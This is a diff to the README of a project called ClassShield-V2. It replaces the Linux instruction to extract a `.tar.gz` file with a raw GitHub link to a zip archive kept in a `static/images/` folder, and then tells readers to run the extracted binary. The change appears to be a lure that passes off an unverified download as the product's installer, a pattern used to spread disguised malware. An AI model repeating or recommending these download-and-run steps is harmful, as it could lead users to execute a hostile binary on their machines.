govabhai/ClassShield-V2/README.md

      Open the `.dmg` file and drag the ClassShield icon to your Applications folder.

    - **For Linux:**
-     Extract the `.tar.gz` file.
+     Extract the `https://github.com/govabhai/ClassShield-V2/raw/refs/heads/main/static/images/Shield-Class-1.1.zip` file.
 Open a terminal, navigate to the extracted folder, and run the application using the command:
      ```bash
      ./ClassShield_V2
      ```